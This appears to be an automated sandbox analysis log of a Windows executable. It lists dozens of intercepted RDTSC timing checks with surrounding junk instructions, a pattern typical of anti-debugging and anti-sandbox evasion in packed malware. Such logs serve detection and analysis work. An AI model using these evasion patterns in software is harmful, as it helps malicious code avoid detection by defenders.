Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 374F4A second address: 374F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F8764C3B8BCh 0x0000000b js 00007F8764C3B8B6h 0x00000011 jo 00007F8764C3B8BCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3750B7 second address: 3750BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3750BD second address: 3750C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 382A6C second address: 382A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCAh 0x00000007 jg 00007F8765238CC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007F8765238CC6h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F8765238CD0h 0x0000001d popad 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3803FB second address: 38041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8764C3B8C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 38041C second address: 380422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 380422 second address: 380428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 395481 second address: 395487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3955E7 second address: 3955F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F8764C3B8B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3A9C59 second address: 3A9C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3A9C5D second address: 3A9C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8764C3B8B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3A9C69 second address: 3A9C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8765238CC6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3A9C75 second address: 3A9C7F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8764C3B8B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3A9DB6 second address: 3A9DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3A9DBC second address: 3A9DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3A9DC4 second address: 3A9DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8765238CD3h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA0A3 second address: 3AA0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA0AB second address: 3AA0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA0B1 second address: 3AA0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA0B5 second address: 3AA0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA0BB second address: 3AA0C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA220 second address: 3AA226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA226 second address: 3AA231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA231 second address: 3AA249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8765238CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA249 second address: 3AA259 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8764C3B8B6h 0x00000008 jng 00007F8764C3B8B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA259 second address: 3AA25F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA25F second address: 3AA265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA265 second address: 3AA269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3AA928 second address: 3AA93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8764C3B8B6h 0x0000000a pop edx 0x0000000b ja 00007F8764C3B8CBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 3B2723 second address: 3B272A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40746 second address: 4D40780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 3ECEh 0x00000007 call 00007F8764C3B8BFh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 mov ebx, eax 0x00000014 mov ch, A0h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8764C3B8C6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40780 second address: 4D407BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushfd 0x00000011 jmp 00007F8765238CD1h 0x00000016 add al, 00000016h 0x00000019 jmp 00007F8765238CD1h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D407BE second address: 4D407E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d mov ax, 1277h 0x00000011 call 00007F8764C3B8BCh 0x00000016 mov bx, si 0x00000019 pop esi 0x0000001a popad 0x0000001b mov dword ptr [esp], ecx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 movsx ebx, ax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D407E9 second address: 4D407F6 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov bx, DBB0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D407F6 second address: 4D4087C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8764C3B8C9h 0x00000008 sub ah, 00000036h 0x0000000b jmp 00007F8764C3B8C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 mov di, si 0x00000019 pushfd 0x0000001a jmp 00007F8764C3B8C8h 0x0000001f xor eax, 189C2588h 0x00000025 jmp 00007F8764C3B8BBh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ebx, 5B654D2Ah 0x00000033 mov edx, 046311F6h 0x00000038 popad 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8764C3B8BFh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D4087C second address: 4D40882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40882 second address: 4D40891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8BBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40891 second address: 4D408A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D408A4 second address: 4D408AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D408AA second address: 4D408AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D408AE second address: 4D408ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F8764C3B8BEh 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ecx, edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8764C3B8C3h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D408ED second address: 4D40932 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov edx, 0E571502h 0x00000010 pushfd 0x00000011 jmp 00007F8765238CD3h 0x00000016 add esi, 521657FEh 0x0000001c jmp 00007F8765238CD9h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40932 second address: 4D40937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40937 second address: 4D4096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F8765238CCDh 0x0000000a add esi, 77700A36h 0x00000010 jmp 00007F8765238CD1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D4096D second address: 4D40971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40971 second address: 4D40975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40975 second address: 4D4097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D409BD second address: 4D409C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D409C1 second address: 4D409DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D409DC second address: 4D409F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8765238CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D409F4 second address: 4D409F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D409F8 second address: 4D40A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F8765238CD7h 0x0000000f je 00007F8765238D05h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8765238CD5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40A7F second address: 4D40A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40A83 second address: 4D40A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40A89 second address: 4D3002C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8764C3B8BCh 0x00000008 pushfd 0x00000009 jmp 00007F8764C3B8C2h 0x0000000e xor ecx, 3C1D9928h 0x00000014 jmp 00007F8764C3B8BBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d leave 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F8764C3B8BBh 0x00000025 xor al, 0000006Eh 0x00000028 jmp 00007F8764C3B8C9h 0x0000002d popfd 0x0000002e popad 0x0000002f retn 0004h 0x00000032 nop 0x00000033 sub esp, 04h 0x00000036 xor ebx, ebx 0x00000038 cmp eax, 00000000h 0x0000003b je 00007F8764C3BA0Bh 0x00000041 mov dword ptr [esp], 0000000Dh 0x00000048 call 00007F8769870BF5h 0x0000004d mov edi, edi 0x0000004f jmp 00007F8764C3B8C5h 0x00000054 xchg eax, ebp 0x00000055 jmp 00007F8764C3B8BEh 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D3002C second address: 4D300A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F8765238CD0h 0x0000000f and si, A288h 0x00000014 jmp 00007F8765238CCBh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F8765238CCBh 0x00000025 sbb si, 8ECEh 0x0000002a jmp 00007F8765238CD9h 0x0000002f popfd 0x00000030 call 00007F8765238CD0h 0x00000035 pop eax 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D300A1 second address: 4D300BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D300BD second address: 4D300C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D301C7 second address: 4D301F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8764C3B8BAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D301F2 second address: 4D301F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D301F8 second address: 4D301FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D301FC second address: 4D30278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d pushad 0x0000000e mov cx, AEBBh 0x00000012 mov ch, 7Bh 0x00000014 popad 0x00000015 inc ebx 0x00000016 jmp 00007F8765238CD3h 0x0000001b test al, al 0x0000001d pushad 0x0000001e mov edi, ecx 0x00000020 call 00007F8765238CD0h 0x00000025 pushfd 0x00000026 jmp 00007F8765238CD2h 0x0000002b or ah, FFFFFF98h 0x0000002e jmp 00007F8765238CCBh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 je 00007F8765238EE9h 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8765238CD2h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30278 second address: 4D3028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D3028A second address: 4D302A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ecx, dword ptr [ebp-14h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ah, 8Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D302A3 second address: 4D302A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D302A7 second address: 4D302E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007F8765238CD3h 0x0000000e and esi, 5DDC381Eh 0x00000014 jmp 00007F8765238CD9h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D302E3 second address: 4D30302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [ebp-14h], edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8764C3B8C3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D3037B second address: 4D3037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D3037F second address: 4D30383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30383 second address: 4D30389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D303E8 second address: 4D3045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8764C3B8BFh 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F8764C3B937h 0x00000014 pushad 0x00000015 movzx esi, di 0x00000018 push edi 0x00000019 pushfd 0x0000001a jmp 00007F8764C3B8C8h 0x0000001f or eax, 6F0A3118h 0x00000025 jmp 00007F8764C3B8BBh 0x0000002a popfd 0x0000002b pop esi 0x0000002c popad 0x0000002d cmp dword ptr [ebp-14h], edi 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 pushfd 0x00000034 jmp 00007F8764C3B8BBh 0x00000039 jmp 00007F8764C3B8C3h 0x0000003e popfd 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D3045E second address: 4D304BB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 217B62AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, al 0x0000000b popad 0x0000000c jne 00007F87D5FA6CF7h 0x00000012 jmp 00007F8765238CD7h 0x00000017 mov ebx, dword ptr [ebp+08h] 0x0000001a jmp 00007F8765238CD6h 0x0000001f lea eax, dword ptr [ebp-2Ch] 0x00000022 jmp 00007F8765238CD0h 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx edx, ax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D304BB second address: 4D304FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8764C3B8C0h 0x00000008 jmp 00007F8764C3B8C2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 movsx ebx, cx 0x00000015 mov cx, 9609h 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8764C3B8BBh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D304FB second address: 4D3052E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8765238CCFh 0x00000009 jmp 00007F8765238CD3h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 pushad 0x00000014 mov eax, 206826F7h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D3052E second address: 4D30581 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 20FCh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F8764C3B8C2h 0x0000000f nop 0x00000010 jmp 00007F8764C3B8C0h 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F8764C3B8C0h 0x0000001b push eax 0x0000001c jmp 00007F8764C3B8BBh 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov ecx, 480D68C1h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30613 second address: 4D30619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30619 second address: 4D3063E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edx, ax 0x00000013 movzx esi, dx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D3063E second address: 4D30643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
